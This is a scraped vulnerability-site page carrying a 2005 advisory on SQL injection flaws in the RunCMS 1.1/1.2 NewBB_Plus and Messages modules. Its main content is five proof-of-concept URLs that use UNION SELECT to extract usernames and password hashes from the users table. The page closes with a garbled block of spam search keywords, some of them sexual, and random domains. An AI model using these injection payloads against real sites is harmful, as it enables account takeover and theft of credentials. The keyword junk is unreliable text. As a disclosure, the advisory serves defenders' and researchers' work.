about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , RunCMS NewBB_Plus and Messages Modules Multiple SQL Injection Vulnerabilities


Title RunCMS NewBB_Plus and Messages Modules Multiple SQL Injection Vulnerabilities
Published 2005-08-22-12:00AM
Updated 2005-08-22-07:51PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  James Bercegay of the GulfTech Security Research Team is credited with the discovery of these vulnerabilities.
Vulnerable  RunCMS RunCMS 1.2
RunCMS RunCMS 1.1 A
RunCMS RunCMS 1.1
Not Vulnerable  
Code   No exploit is required.

The following proof of concept URI are available:
http://www.example.com/runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*
http://www.example.com/runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2'&topic_id=2&viewmode=flat&order=0
http://www.example.com/runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2&topic_id=2&viewmode=flat&order=0
http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_pn
http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_sent_pn
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 13:39:27 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Manisha ko https://20 Squid NTLM php-nuke+2 www.xmchua mobileerec www.zhangg www.89.... telugu hot www.xmchua t344t www.beiduo Phonerica news pappe www.szjaew all cartoo www.trish Crack Data news for C MS06-35 www.ycw919 www.bollyw www.wokoo8 linux http post.cnfol www.gupiao fuck man t Original s php-nuke 2 lite 1.0.2 phpRaid phpRaid Text windows xp t297t Phonerotic t448t auction1.p www.chinac guest book Sonal sex www_89_com www.zsjing very_sexy_ sendmail 8 Elevintra maxcpm.inf samatejz.c Jgn www.cnzxw.